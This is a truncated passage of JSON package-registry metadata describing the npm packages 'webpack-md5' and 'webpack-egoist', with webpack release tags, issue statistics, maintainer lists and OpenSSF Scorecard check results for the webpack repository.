30ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-21T02:08:00.561Z","dependent_packages_count":0,"downloads":7,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":36.43231172096657,"dependent_packages_count":52.36931779834162,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":44.4008147596541},"purl":"pkg:npm/webpack-md5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-md5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-md5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-md5/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-20T20:00:07.033Z","issues_count":10162,"pull_requests_count":9386,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2758812.4810541794,"issues_closed_count":9895,"pull_requests_closed_count":8841,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834382995473332,"avg_comments_per_pull_request":3.1543788621350948,"merged_pull_requests_count":5983,"bot_issues_count":8,"bot_pull_requests_count":2907,"past_year_issues_count":80,"past_year_pull_requests_count":897,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":359394.0157142857,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":700,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.3625,"past_year_avg_comments_per_pull_request":4.655518394648829,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":137,"past_year_merged_pull_requests_count":550,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1051,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":122,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":411,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":81,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-md5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-md5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-md5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-md5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-md5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-md5/codemeta","maintainers":[{"uuid":"lonyil75","login":"lonyil75","name":null,"email":"bertrandlonie55@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~lonyil75","role":null,"created_at":"2023-11-16T20:38:36.234Z","updated_at":"2023-11-16T20:38:36.234Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/lonyil75/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2567130,"name":"webpack-egoist","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2016-12-23T15:05:08.516Z","latest_release_published_at":"2016-12-23T15:05:08.516Z","latest_release_number":"2.2.0-rc.2","last_synced_at":"2026-09-03T00:18:55.356Z","created_at":"2022-04-10T03:38:04.457Z","updated_at":"2026-09-03T00:18:55.356Z","registry_url":"https://www.npmjs.com/package/webpack-egoist","install_command":"npm install webpack-egoist","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"2.2.0-rc.2"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release 